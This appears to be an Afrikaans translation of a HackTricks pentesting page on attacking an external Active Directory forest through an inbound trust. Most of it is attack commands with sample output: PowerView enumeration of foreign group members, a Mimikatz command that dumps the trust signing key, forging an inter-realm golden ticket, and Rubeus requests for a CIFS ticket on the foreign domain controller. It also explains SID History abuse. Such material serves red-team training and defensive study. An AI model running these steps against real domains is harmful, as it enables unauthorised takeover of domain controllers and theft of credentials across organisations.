Eksterne Woud-domein - Eenrigting (Inkomend) of bidireksioneel

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In hierdie scenario vertrou 'n eksterne domein jou (of albei vertrou mekaar), sodat jy 'n soort toegang daaroor kan verkry.


Eerstens moet jy die vertroue opneem:

SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustAttributes :
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.

In die vorige opsomming is gevind dat die gebruiker crossuser binne die External Admins groep is wat Admin toegang het binne die DC van die eksterne domein.

Begin Toegang

As jy nie enige spesiale toegang van jou gebruiker in die ander domein kon vind nie, kan jy steeds teruggaan na die AD Metodologie en probeer om te privesc vanaf 'n nie-bevoorregte gebruiker (goed soos kerberoasting byvoorbeeld):

Jy kan Powerview funksies gebruik om die ander domein te opsom met die -Domain param soos in:

Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName

Active Directory Methodology



Deur 'n gewone metode te gebruik met die geloofsbriewe van die gebruikers wat toegang het tot die eksterne domein, behoort jy toegang te hê tot:

Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator

SID Geskiedenis Misbruik

Jy kan ook SID Geskiedenis oor 'n woud vertroue misbruik.

As 'n gebruiker van een woud na 'n ander gemigreer word en SID Filtrering nie geaktiveer is nie, word dit moontlik om 'n SID van die ander woud by te voeg, en hierdie SID sal bygevoeg word tot die gebruiker se token wanneer hulle oor die vertroue autentiseer.


Ter herinnering, jy kan die ondertekeningssleutel kry met

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local

Jy kan onderteken met die vertroude sleutel 'n TGT wat die gebruiker van die huidige domein naboots.

# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

Volledige manier om die gebruiker na te doen

# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller


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Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

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